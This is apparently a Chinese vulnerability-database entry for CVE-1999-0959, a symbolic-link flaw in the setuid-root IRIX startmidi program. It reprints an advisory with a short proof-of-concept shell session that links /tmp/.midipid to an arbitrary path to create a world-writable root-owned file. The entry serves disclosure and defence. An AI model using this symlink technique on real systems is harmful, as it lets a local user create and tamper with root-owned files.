IRIX startmidi程序漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105280 漏洞类型 其他
发布时间 1997-02-09 更新时间 2005-05-02
CVE编号 CVE-1999-0959 CNNVD-ID CNNVD-199702-004
漏洞平台 IRIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19355
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199702-004
|漏洞详情
IRIXstartmidi程序存在漏洞。本地用户可以通过符号链接修改任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/469/info

A vulnerability exists in the startmidi program from Silicon Graphics. This utility is included with Irix versions 5.x and 6.x with the Iris Digital Media Execution Environment. startmidi is setuid root, and creates a temporary file called /tmp/.midipid. It does not check to see if this file already exists, and is a symbolic link. As such, it can be used to create root owned files, with permissions as set by the user umask.


% umask 0
% ln -s /blardyblar /tmp/.midipid
% startmidi -d /dev/ttyd1
% ls -l /blardyblar
-rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar
% stopmidi -d /dev/ttyd1
%
|参考资料

来源:BID
名称:469
链接:http://www.securityfocus.com/bid/469
来源:OSVDB
名称:8447
链接:http://www.osvdb.org/8447
来源:SGI
名称:19980301-01-PX
链接:ftp://patches.sgi.com/support/free/security/advisories/19980301-01-PX